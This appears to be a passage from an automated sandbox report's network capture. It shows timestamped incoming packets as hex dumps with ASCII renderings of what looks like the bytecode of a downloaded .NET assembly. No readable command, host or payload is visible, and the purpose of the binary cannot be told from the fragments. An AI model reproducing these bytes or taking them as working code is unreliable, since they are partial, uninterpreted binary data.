2023-11-18 09:02:33 UTC	54	IN	Data Raw: 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 75 47 00 70 d0 b3 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 91 47 00 70 d0 b3 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 7d 01 00 0a 03 28 6f 00 00 0a 2c 07 28 fb 01 00 06 10 01 03 28 fe 01 00 06 28 ff 01 00 06 0c 28 71 00 00 0a 72 9f 47 00 70 18 8d 1c 00 00 01 25 16 03 a2 25 17 08 a2 28 40 05 00 06 02 73 6b 01 00 06 0d 09 6f 92 01 00 06 13 04 38 ba 02 00 00 04 28 6f 00 00 0a 2d 14 04 11 04 18 6f 98 01 00 0a 1b 28 77 00 00 0a 3a 9e 02 00 00 00 28 71 00 00 0a 72 34 48 00 70 18 8d 1c 00 00 01 25 16 03 a2 25 17 11 04 18 6f 98 01 00 0a a2 28 40 05 00 06 02 73 6b 01 00 06 13 05 11 05 18 6f 91 01 00 06 13 06 11 06 17 17 6f ee 03 00 06 13 07 11 07 6f 0d 01 00 0a 6f 0e 01 00 0a 13 08 38 f7 01 00 00 11 Data Ascii: \|&oruGp(>o\|&orGp(>o\|&o}(o,((((qrGp%%(@sko8(o-o(w:(qr4Hp%%o(@skoooo8
2023-11-18 09:02:33 UTC	56	IN	Data Raw: 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 18 49 00 70 d0 b5 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 30 49 00 70 d0 b5 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 4a 49 00 70 d0 b5 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 56 49 00 70 d0 b3 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 74 49 00 70 d0 b3 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 8c 49 00 70 d0 b5 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 99 44 00 70 d0 b5 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 4d 44 00 70 d0 bd 00 00 01 28 Data Ascii: \|&orIp(>o\|&or0Ip(>o\|&orJIp(>o\|&orVIp(>o\|&ortIp(>o\|&orIp(>o\|&orDp(>o\|&orMDp(
2023-11-18 09:02:34 UTC	56	IN	Data Raw: 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 65 44 00 70 d0 5e 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 7d 44 00 70 d0 c3 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 aa 49 00 70 d0 d0 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 be 49 00 70 d0 5d 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 d6 49 00 70 d0 b5 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 e2 49 00 70 d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 04 4a 00 70 d0 b3 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 1a 4a 00 70 d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 7d 01 00 0a 03 28 6f 00 00 0a 2c 07 28 fb 01 00 06 10 01 03 28 fe 01 00 06 28 ff Data Ascii: >o\|&oreDp^(>o\|&or}Dp(>o\|&orIp(>o\|&orIp](>o\|&orIp(>o\|&orIp(>o\|&orJp(>o\|&orJp(>o\|&o}(o,(((
2023-11-18 09:02:34 UTC	57	IN	Data Raw: 00 00 00 00 00 00 00 02 00 00 00 81 03 00 00 53 00 00 00 d4 03 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 55 03 00 00 8d 00 00 00 e2 03 00 00 03 00 00 00 4c 00 00 02 02 00 00 00 bb 05 00 00 2c 00 00 00 e7 05 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 b2 05 00 00 43 00 00 00 f5 05 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 67 06 00 00 4c 00 00 00 b3 06 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 5e 06 00 00 63 00 00 00 c1 06 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 dd 04 00 00 0a 02 00 00 e7 06 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 d4 04 00 00 21 02 00 00 f5 06 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 a8 04 00 00 5b 02 00 00 03 07 00 00 03 00 00 00 4c 00 00 02 02 00 00 00 2b 03 00 00 e9 03 00 00 14 07 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 22 03 00 00 Data Ascii: SUL,CgL^c![L+"
2023-11-18 09:02:34 UTC	59	IN	Data Raw: 06 6f 0a 01 00 0a 72 01 44 00 70 d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 1d 44 00 70 d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 37 44 00 70 d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 ef 4e 00 70 d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 0f 4f 00 70 d0 b3 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 29 4f 00 70 d0 b3 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 33 47 00 70 d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 43 4f 00 70 d0 2c 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 5d 4f 00 70 d0 2c 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 7d 01 00 0a 03 28 6f 00 00 0a Data Ascii: orDp(>o\|&orDp(>o\|&or7Dp(>o\|&orNp(>o\|&orOp(>o\|&or)Op(>o\|&or3Gp(>o\|&orCOp,(>o\|&or]Op,(>o\|&o}(o
2023-11-18 09:02:34 UTC	60	IN	Data Raw: 0a 26 25 6f 0a 01 00 0a 72 11 52 00 70 d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 25 6f 0a 01 00 0a 72 2d 52 00 70 d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 25 6f 0a 01 00 0a 72 49 52 00 70 d0 b3 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 25 6f 0a 01 00 0a 72 5f 52 00 70 d0 d0 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 25 6f 0a 01 00 0a 72 79 52 00 70 d0 d0 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 25 6f 0a 01 00 0a 72 93 52 00 70 d0 b3 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 25 6f 7d 01 00 0a 28 44 06 00 06 73 83 01 00 0a 0a 25 06 6f 84 01 00 0a 26 06 6f 85 01 00 0a 25 6f 12 01 00 0a 25 6f 82 01 00 0a 2a 00 1b 30 09 00 d6 05 00 00 7c 00 00 11 72 b7 52 00 70 73 7a 01 00 0a 0a 73 b0 01 00 0a 0c 06 28 71 00 00 0a 6f 7b 01 00 0a 06 6f 0a 01 00 0a Data Ascii: &%orRp(>o\|&%or-Rp(>o\|&%orIRp(>o\|&%or_Rp(>o\|&%oryRp(>o\|&%orRp(>o\|&%o}(Ds%o&o%o%o*0\|rRpszs(qo{o
2023-11-18 09:02:34 UTC	61	IN	Data Raw: 07 72 37 44 00 70 11 0b 18 6f 98 01 00 0a 6f 9b 01 00 0a 07 72 4d 44 00 70 11 0f 6f 9b 01 00 0a 07 72 e4 48 00 70 11 0b 17 6f 98 01 00 0a 6f 9b 01 00 0a 07 72 99 44 00 70 11 0c 8c b5 00 00 01 6f 9b 01 00 0a 14 13 10 16 13 11 16 13 12 11 0f 2c 1c 02 7b 41 01 00 04 03 11 0b 17 6f 98 01 00 0a 11 0f 12 11 12 12 12 10 6f 03 01 00 06 11 10 28 6f 00 00 0a 2d 0d 07 72 df 46 00 70 11 10 6f 9b 01 00 0a 07 72 3b 53 00 70 11 11 2c 07 72 22 54 00 70 2b 05 72 7d 53 00 70 6f 9b 01 00 0a 07 72 4f 53 00 70 11 12 8c b5 00 00 01 6f 9b 01 00 0a 11 0c 17 58 13 0c 0e 04 2c 0c 0e 04 11 0f 1b 28 77 00 00 0a 2d 0c 06 6f 0d 01 00 0a 07 6f 81 01 00 0a 11 0e 6f a7 00 00 0a 3a d8 fe ff ff de 0c 11 0e 2c 07 11 0e 6f 45 00 00 0a dc de 0c 11 0d 2c 07 11 0d 6f 45 00 00 0a dc de 03 26 de Data Ascii: r7DpoorMDporHpoorDpo,{Aoo(o-rFpor;Sp,r"Tp+r}SporOSpoX,(w-ooo:,oE,oE&
2023-11-18 09:02:34 UTC	63	IN	Data Raw: 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 03 28 6f 00 00 0a 2c 07 28 fb 01 00 06 10 01 03 28 fe 01 00 06 28 ff 01 00 06 13 06 06 6f 7d 01 00 0a 28 71 00 00 0a 72 79 4f 00 70 18 8d 1c 00 00 01 25 16 03 a2 25 17 11 06 a2 28 40 05 00 06 02 73 6b 01 00 06 13 07 11 07 6f 92 01 00 06 13 08 38 4b 03 00 00 04 28 6f 00 00 0a 2d 14 04 11 08 18 6f 98 01 00 0a 1b 28 77 00 00 0a 3a 2f 03 00 00 28 71 00 00 0a 72 34 48 00 70 18 8d 1c 00 00 01 25 16 03 a2 25 17 11 08 18 6f 98 01 00 0a a2 28 40 05 00 06 02 73 6b 01 00 06 13 09 11 08 1a 6f 98 01 00 0a 1f 0d 1f 20 6f ad 01 00 0a 1f 0a 1f 20 6f ad 01 00 0a 1f 09 1f 20 6f ad 01 00 0a 0c 28 71 00 00 0a 6f ae 01 00 0a 08 72 df 4f 00 70 17 6f af 01 00 0a 0d 09 16 2f 05 dd bf 02 00 00 08 09 1a 58 6f 7a 00 00 0a 0c 08 02 73 6b 01 00 Data Ascii: (>o\|&(o,(((o}(qryOp%%(@sko8K(o-o(w:/(qr4Hp%%o(@sko o o o(qorOpo/Xozsk
2023-11-18 09:02:34 UTC	64	IN	Data Raw: 00 70 d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 c4 54 00 70 d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 e4 54 00 70 d0 b3 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 00 55 00 70 d0 b3 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 26 55 00 70 d0 b5 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 36 55 00 70 d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 58 55 00 70 d0 b5 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 8e 55 00 70 d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 ae 55 00 70 d0 bd 00 00 01 28 3e 00 00 0a 6f 7c 01 00 0a 26 06 6f 0a 01 00 0a 72 cc 55 00 70 d0 bd 00 00 01 28 3e 00 00 0a Data Ascii: p(>o\|&orTp(>o\|&orTp(>o\|&orUp(>o\|&or&Up(>o\|&or6Up(>o\|&orXUp(>o\|&orUp(>o\|&orUp(>o\|&orUp(>
2023-11-18 09:02:34 UTC	65	IN	Data Raw: ee 01 00 06 02 7b 53 01 00 04 2d 1b 02 7b 41 01 00 04 2c 0c 02 7b 41 01 00 04 14 6f 38 01 00 06 02 14 7d 5a 01 00 04 2a 00 13 30 03 00 47 00 00 00 00 00 00 00 02 28 24 02 00 06 02 7b 54 01 00 04 2d 31 02 02 fe 06 b3 02 00 06 73 c5 02 00 06 7d 5b 01 00 04 02 7b 41 01 00 04 2c 17 02 7b 41 01 00 04 02 7b 4f 01 00 04 02 7b 5b 01 00 04 6f 39 01 00 06 02 03 28 ef 01 00 06 2a ca 02 28 24 02 00 06 02 03 28 f0 01 00 06 02 7b 54 01 00 04 2d 1c 02 7b 41 01 00 04 2c 0d 02 7b 41 01 00 04 16 14 6f 39 01 00 06 02 14 7d 5b 01 00 04 2a 00 00 13 30 03 00 41 00 00 00 00 00 00 00 02 28 24 02 00 06 02 7b 55 01 00 04 2d 2b 02 02 fe 06 b4 02 00 06 73 c9 02 00 06 7d 5c 01 00 04 02 7b 41 01 00 04 2c 11 02 7b 41 01 00 04 02 7b 5c 01 00 04 6f 3a 01 00 06 02 03 28 f1 01 00 06 2a c6 Data Ascii: {S-{A,{Ao8}Z0G(${T-1s}[{A,{A{O{[o9(($({T-{A,{Ao9}[0A(${U-+s}\{A,{A{\o:(
2023-11-18 09:02:34 UTC	67	IN	Data Raw: 00 04 2a 00 1b 30 07 00 63 00 00 00 82 00 00 11 02 7b 58 01 00 04 2c 18 02 7b 58 01 00 04 02 04 15 28 6d 03 00 06 73 05 03 00 06 6f f6 02 00 06 de 40 0a 02 7b 46 01 00 04 28 3a 05 00 06 2c 2b 20 00 15 13 80 28 57 00 00 0a 72 d8 56 00 70 18 8d 1c 00 00 01 25 16 72 62 57 00 70 a2 25 17 06 a2 28 40 05 00 06 28 b4 04 00 06 de 03 26 de 00 de 00 2a 00 01 1c 00 00 00 00 23 00 3a 5d 00 03 1c 00 00 01 00 00 00 00 22 22 00 40 32 00 00 01 13 30 03 00 41 00 00 00 00 00 00 00 02 28 24 02 00 06 02 7b 59 01 00 04 2d 2b 02 02 fe 06 be 02 00 06 73 dd 02 00 06 7d 60 01 00 04 02 7b 41 01 00 04 2c 11 02 7b 41 01 00 04 02 7b 60 01 00 04 6f 3f 01 00 06 02 03 28 f9 01 00 06 2a c6 02 28 24 02 00 06 02 03 28 fa 01 00 06 02 7b 59 01 00 04 2d 1b 02 7b 41 01 00 04 2c 0c 02 7b 41 01 Data Ascii: 0c{X,{X(mso@{F(:,+ (WrVp%rbWp%(@(&#:]""@20A(${Y-+s}`{A,{A{`o?(*($({Y-{A,{A
2023-11-18 09:02:34 UTC	71	IN	Data Raw: 30 03 00 3e 00 00 00 6c 00 00 11 02 72 84 5a 00 70 12 00 6f d3 01 00 0a 2c 2d 06 75 21 00 00 01 2c 07 06 a5 21 00 00 01 2a 06 2c 1b d0 21 00 00 01 28 3e 00 00 0a 28 d6 01 00 0a 06 6f d7 01 00 0a a5 21 00 00 01 2a 16 2a 4a 02 72 84 5a 00 70 03 8c 21 00 00 01 6f d5 01 00 0a 2a 00 00 00 13 30 03 00 2a 00 00 00 6c 00 00 11 02 72 9e 5a 00 70 12 00 6f d3 01 00 0a 2c 19 06 75 bd 00 00 01 2c 07 06 74 bd 00 00 01 2a 06 2c 07 06 6f 56 00 00 0a 2a 14 2a 36 02 72 9e 5a 00 70 03 6f d5 01 00 0a 2a 13 30 03 00 2a 00 00 00 6c 00 00 11 02 72 c8 5a 00 70 12 00 6f d3 01 00 0a 2c 19 06 75 bd 00 00 01 2c 07 06 74 bd 00 00 01 2a 06 2c 07 06 6f 56 00 00 0a 2a 14 2a 36 02 72 c8 5a 00 70 03 6f d5 01 00 0a 2a 13 30 03 00 38 00 00 00 6c 00 00 11 02 72 e6 5a 00 70 12 00 6f d3 01 00 Data Ascii: 0>lrZpo,-u!,!,!(>(o!JrZp!o0lrZpo,u,t,oV*6rZpo0lrZpo,u,t,oV*6rZpo08lrZpo
2023-11-18 09:02:34 UTC	73	IN	Data Raw: eb 01 00 0a 13 06 de 00 11 06 2a 00 01 10 00 00 00 00 b3 00 2a dd 00 17 1c 00 00 01 13 30 04 00 a6 00 00 00 91 00 00 11 0f 00 28 f5 01 00 0a 0a 0f 00 28 f6 01 00 0a 0b 0f 00 28 f7 01 00 0a 0c 07 18 30 09 06 17 59 0a 07 1f 0c 58 0b 06 1f 64 5b 0d 18 09 59 09 1a 5b 58 13 04 20 ad 8e 00 00 06 20 6c 12 00 00 58 5a 1f 64 5b 20 51 ab 04 00 07 17 58 5a 20 10 27 00 00 5b 13 05 11 05 58 08 58 11 04 58 6c 23 00 00 00 00 00 d2 97 40 59 23 00 00 00 00 70 99 94 41 5a 6a 0f 00 28 f9 01 00 0a 20 80 ee 36 00 5a 0f 00 28 fa 01 00 0a 20 60 ea 00 00 5a 58 0f 00 28 fb 01 00 0a 20 e8 03 00 00 5a 58 0f 00 28 fc 01 00 0a 58 6a 58 2a 66 03 02 7b 95 01 00 04 02 7b 96 01 00 04 02 7b 97 01 00 04 28 75 03 00 06 2a 13 30 05 00 0c 01 00 00 00 00 00 00 03 45 06 00 00 00 05 00 00 00 af Data Ascii: *0(((0YXd[Y[X lXZd[ QXZ '[XXXl#@Y#pAZj( 6Z( `ZX( ZX(XjXf{{{(u*0E
2023-11-18 09:02:34 UTC	77	IN	Data Raw: 1f 09 17 73 a7 03 00 06 a2 25 1f 43 72 bc 63 00 70 1f 14 17 73 a7 03 00 06 a2 25 1f 44 72 dc 63 00 70 18 16 73 a7 03 00 06 a2 25 1f 45 72 fe 63 00 70 1f 12 16 73 a7 03 00 06 a2 25 1f 46 72 22 64 00 70 1f 13 16 73 a7 03 00 06 a2 25 1f 47 72 46 64 00 70 1f 14 16 73 a7 03 00 06 a2 25 1f 48 72 6a 64 00 70 17 16 73 a7 03 00 06 a2 25 1f 49 72 7e 64 00 70 16 17 73 a7 03 00 06 a2 25 1f 4a 72 8e 64 00 70 16 16 73 a7 03 00 06 a2 25 1f 4b 72 a0 64 00 70 19 16 73 a7 03 00 06 a2 73 a0 03 00 06 2a 76 02 1f 10 30 0a 02 2c 11 02 1f 10 2e 0c 2b 0c 02 1f 16 2e 05 02 1f 17 33 02 17 2a 16 2a 6e 02 75 bd 00 00 01 2c 07 02 74 bd 00 00 01 2a 02 2c 07 02 6f 56 00 00 0a 2a 14 2a 00 00 1b 30 04 00 9b 00 00 00 9d 00 00 11 02 2d 04 16 6a 2b 06 02 6f 65 02 00 06 20 00 00 00 08 6a 28 Data Ascii: s%Crcps%Drcps%Ercps%Fr"dps%GrFdps%Hrjdps%Ir~dps%Jrdps%Krdpssv0,.+.3nu,t,oV**0-j+oe j(
2023-11-18 09:02:34 UTC	81	IN	Data Raw: 00 00 02 00 9d 00 11 ae 00 0f 00 00 00 00 22 02 16 7d 1d 02 00 04 2a 00 00 00 1b 30 0c 00 2c 01 00 00 00 00 00 00 02 28 c4 03 00 06 02 28 f7 03 00 06 1f 0e 14 14 02 7b 0f 02 00 04 02 14 14 1d 8d 1c 00 00 01 25 16 02 7b 19 02 00 04 8c 48 00 00 01 a2 25 17 02 7b 13 02 00 04 8c b5 00 00 01 a2 25 18 02 7b 14 02 00 04 8c b5 00 00 01 a2 25 19 02 7b 16 02 00 04 8c b5 00 00 01 a2 25 1a 02 7b 15 02 00 04 8c b5 00 00 01 a2 25 1b 02 7b 1a 02 00 04 8c b3 00 00 01 a2 25 1c 02 7b 1b 02 00 04 8c b3 00 00 01 a2 73 e6 01 00 06 28 09 02 00 06 02 7b 0f 02 00 04 2c 5f 02 7b 1d 02 00 04 2c 0d 02 6f e9 00 00 0a 2d f8 de 03 26 de 00 02 7b 0f 02 00 04 6f 93 01 00 06 de 3d 02 7b 19 02 00 04 1f 20 5f 2c 1d 02 7b 0f 02 00 04 6f 81 01 00 06 2c 10 02 7b 0f 02 00 04 6f 81 01 00 06 6f Data Ascii: "}*0,(({%{H%{%{%{%{%{%{s({,_{,o-&{o={ _,{o,{oo
2023-11-18 09:02:34 UTC	85	IN	Data Raw: 00 02 28 c4 03 00 06 03 02 28 cf 03 00 06 32 1c 02 7b 1c 02 00 04 2c 14 02 7b 1c 02 00 04 03 02 28 cf 03 00 06 59 6f 88 04 00 06 2a 02 7b 12 02 00 04 7b ea 02 00 04 02 7b 12 02 00 04 03 6f ff 00 00 06 2a 00 13 30 03 00 43 00 00 00 00 00 00 00 02 28 c4 03 00 06 03 02 28 cf 03 00 06 32 1c 02 7b 1c 02 00 04 2c 14 02 7b 1c 02 00 04 03 02 28 cf 03 00 06 59 6f 89 04 00 06 2a 02 7b 12 02 00 04 7b ea 02 00 04 02 7b 12 02 00 04 03 6f 00 01 00 06 2a 00 13 30 03 00 43 00 00 00 00 00 00 00 02 28 c4 03 00 06 03 02 28 cf 03 00 06 32 1c 02 7b 1c 02 00 04 2c 14 02 7b 1c 02 00 04 03 02 28 cf 03 00 06 59 6f 8a 04 00 06 2a 02 7b 12 02 00 04 7b ea 02 00 04 02 7b 12 02 00 04 03 6f fe 00 00 06 2a 00 13 30 03 00 a2 00 00 00 1b 00 00 11 02 28 c4 03 00 06 02 7b 1b 02 00 04 26 02 Data Ascii: ((2{,{(Yo{{{o0C((2{,{(Yo{{{o0C((2{,{(Yo{{{o0({&
2023-11-18 09:02:34 UTC	89	IN	Data Raw: 7b 12 02 00 04 7b ea 02 00 04 02 7b 12 02 00 04 03 6f 0f 01 00 06 28 f8 03 00 06 0a 02 7b 12 02 00 04 7b ea 02 00 04 02 7b 12 02 00 04 02 7b 10 02 00 04 03 06 6f 44 01 00 06 2a 00 13 30 04 00 2f 00 00 00 1d 00 00 11 02 28 c4 03 00 06 02 6f eb 00 00 0a 0a 03 8e 69 06 2f 04 03 8e 69 0a 16 0b 2b 0e 03 07 02 07 6f a9 01 00 0a a2 07 17 58 0b 07 06 32 ee 06 2a 00 13 30 03 00 77 00 00 00 b3 00 00 11 02 28 c4 03 00 06 02 7b 12 02 00 04 2c 0d 02 7b 12 02 00 04 7b ea 02 00 04 2d 06 73 44 01 00 0a 7a 02 28 cf 03 00 06 0a 06 73 76 02 00 0a 0b 16 0c 2b 3e 02 7b 12 02 00 04 7b ea 02 00 04 02 7b 12 02 00 04 08 6f fa 00 00 06 0d 02 7b 12 02 00 04 7b ea 02 00 04 02 7b 12 02 00 04 08 6f 0f 01 00 06 13 04 07 09 11 04 6f 77 02 00 0a 08 17 58 0c 08 06 32 be 07 2a 00 13 30 02 Data Ascii: {{{o({{{{oD0/(oi/i+oX20w({,{{-sDz(sv+>{{{o{{{oowX2*0
2023-11-18 09:02:34 UTC	93	IN	Data Raw: 97 02 00 04 03 6f 27 01 00 06 2a 04 6f 7d 00 00 0a 0a 06 d0 2c 00 00 01 28 3e 00 00 0a 28 c1 00 00 0a 2c 1e 02 7b 97 02 00 04 03 02 7b 97 02 00 04 04 a5 2c 00 00 01 6f 7d 03 00 06 6f 28 01 00 06 2a 04 75 32 00 00 01 0b 07 2c 13 02 7b 97 02 00 04 03 07 6f 93 02 00 0a 6f 24 01 00 06 2a 06 02 7b 99 02 00 04 28 91 03 00 06 0c 08 17 59 45 05 00 00 00 0e 00 00 00 26 00 00 00 3e 00 00 00 51 00 00 00 01 00 00 00 2a 02 7b 97 02 00 04 03 6f 27 01 00 06 2a 02 7b 97 02 00 04 03 04 28 57 00 00 0a 28 94 02 00 0a 6f 26 01 00 06 2a 02 7b 97 02 00 04 03 04 28 57 00 00 0a 28 95 02 00 0a 6f 23 01 00 06 2a 02 7b 97 02 00 04 03 04 6f 56 00 00 0a 6f 28 01 00 06 2a 02 7b 97 02 00 04 03 04 74 17 00 00 1b 6f 22 01 00 06 2a 00 00 00 1b 30 07 00 5f 00 00 00 82 00 00 11 02 03 7d 9f Data Ascii: o'o},(>(,{{,o}o(u2,{oo${(YE&>Q{o'{(W(o&{(W(o#{oVo({to"*0_}
2023-11-18 09:02:34 UTC	97	IN	Data Raw: 00 00 01 25 16 12 0e 28 b9 02 00 0a a2 25 18 11 10 a2 6f 77 01 00 0a 13 12 16 13 13 2b 7f 11 12 6f 0d 01 00 0a 6f 0e 01 00 0a 13 06 2b 49 11 06 6f 39 00 00 0a 74 55 00 00 01 13 14 11 13 2d 19 11 14 72 4b 47 00 70 6f f2 00 00 0a a5 b3 00 00 01 2c 06 11 14 13 11 de 3e 11 13 17 33 19 11 14 72 91 47 00 70 6f f2 00 00 0a a5 b3 00 00 01 2c 06 11 14 13 11 de 20 11 06 6f 55 00 00 0a 2d ae de 15 11 06 75 34 00 00 01 13 08 11 08 2c 07 11 08 6f 45 00 00 0a dc 11 13 17 58 13 13 11 13 18 2f 07 11 11 39 75 ff ff ff 11 11 2d 19 12 0e 28 b7 02 00 0a 11 0f 6f ba 02 00 0a 11 0f 17 59 13 0f dd 1d 03 00 00 03 72 70 4d 00 70 19 8d bd 00 00 01 25 16 12 0e 28 b9 02 00 0a a2 25 18 11 10 a2 6f 77 01 00 0a 13 15 06 12 0e 28 b9 02 00 0a 6f bb 02 00 0a 13 16 11 15 6f 0d 01 00 0a 16 Data Ascii: %(%ow+oo+Io9tU-rKGpo,>3rGpo, oU-u4,oEX/9u-(oYrpMp%(%ow(oo
2023-11-18 09:02:34 UTC	101	IN	Data Raw: 8f ac 00 00 02 7b fb 03 00 04 2c 2d 02 7b be 02 00 04 03 8f ac 00 00 02 7b fb 03 00 04 7b 01 04 00 04 02 7b be 02 00 04 03 8f ac 00 00 02 7b fc 03 00 04 6f a9 01 00 0a 2a 02 03 28 9c 04 00 06 2c 06 7e 8b 00 00 0a 2a 02 03 28 99 04 00 06 8c c3 00 00 01 2a 00 00 00 13 30 04 00 89 00 00 00 00 00 00 00 02 7b be 02 00 04 03 8f ac 00 00 02 7b fa 03 00 04 15 33 02 17 2a 02 03 28 82 04 00 06 02 7b be 02 00 04 03 8f ac 00 00 02 7b fb 03 00 04 2c 2d 02 7b be 02 00 04 03 8f ac 00 00 02 7b fb 03 00 04 7b 01 04 00 04 02 7b be 02 00 04 03 8f ac 00 00 02 7b fc 03 00 04 6f aa 01 00 0a 2a 02 7b bf 02 00 04 7b ea 02 00 04 02 7b bf 02 00 04 02 7b be 02 00 04 03 8f ac 00 00 02 7b fa 03 00 04 6f 43 01 00 06 16 6a fe 01 2a 00 00 00 1b 30 04 00 b7 02 00 00 d0 00 00 11 14 0a 16 Data Ascii: {,-{{{{{o(,~(0{{3({{,-{{{{{o{{{{{oCj0
2023-11-18 09:02:34 UTC	105	IN	Data Raw: 26 07 17 58 0b 07 06 32 e5 2a 4e 02 17 7d e9 02 00 04 02 7b e8 02 00 04 6f f3 02 00 0a 2a 3a 02 03 6f ed 02 00 0a 15 fe 01 16 fe 01 2a 4a 02 7b e8 02 00 04 03 74 63 00 00 02 6f f4 02 00 0a 2a 1a 73 8c 00 00 0a 7a 32 02 7b e8 02 00 04 6f ee 02 00 0a 2a 36 02 03 6f f5 02 00 0a 74 63 00 00 02 2a 26 02 03 04 6f f6 02 00 0a 2a 36 02 03 6f f7 02 00 0a 74 63 00 00 02 2a 26 02 03 04 6f f0 02 00 0a 2a 3a 02 02 03 6f ed 02 00 0a 6f f7 02 00 0a 2a 36 02 7b e8 02 00 04 03 6f f8 02 00 0a 2a 00 00 13 30 03 00 36 00 00 00 1d 00 00 11 02 7b e8 02 00 04 6f ee 02 00 0a 0a 16 0b 2b 20 03 02 7b e8 02 00 04 07 6f f8 02 00 0a 6f e1 02 00 0a 1b 28 77 00 00 0a 2d 02 07 2a 07 17 58 0b 07 06 32 dc 15 2a 4a 02 7b e8 02 00 04 03 74 63 00 00 02 6f f9 02 00 0a 2a 6a 02 17 7d e9 02 00 Data Ascii: &X2N}{o:oJ{tcosz2{o6otc&o6otc&o:oo6{o06{o+ {oo(w-X2J{tcoj}
2023-11-18 09:02:34 UTC	109	IN	Data Raw: 00 02 02 00 8a 00 32 bc 00 0a 00 00 00 00 00 00 7e 00 4a c8 00 1d 4c 00 00 02 1b 30 03 00 b3 00 00 00 e4 00 00 11 02 7c f8 02 00 04 14 28 0e 00 00 2b 0a 06 39 9f 00 00 00 02 7b f5 02 00 04 2d 36 06 6f 37 02 00 06 0b 07 72 d3 79 00 70 6f a0 00 00 0a 07 6f 1d 01 00 0a 26 de 0a 07 2c 06 07 6f 45 00 00 0a dc 06 16 7d 38 01 00 04 de 69 26 03 2c 02 fe 1a de 61 00 06 6f 37 02 00 06 0c 02 7b f6 02 00 04 28 6f 00 00 0a 2c 0b 72 61 7a 00 70 73 02 04 00 06 7a 08 72 a7 7a 00 70 02 7b f6 02 00 04 28 10 03 00 0a 6f a0 00 00 0a 08 6f 1d 01 00 0a 26 de 0a 08 2c 06 08 6f 45 00 00 0a dc 06 25 7b 38 01 00 04 17 59 7d 38 01 00 04 de 08 26 03 2c 02 fe 1a de 00 2a 00 01 34 00 00 02 00 22 00 14 36 00 0a 00 00 00 00 00 00 1b 00 2e 49 00 08 1c 00 00 01 02 00 59 00 37 90 00 0a 00 Data Ascii: 2~JL0\|(+9{-6o7rypoo&,oE}8i&,ao7{(o,razpszrzp{(oo&,oE%{8Y}8&,*4"6.IY7
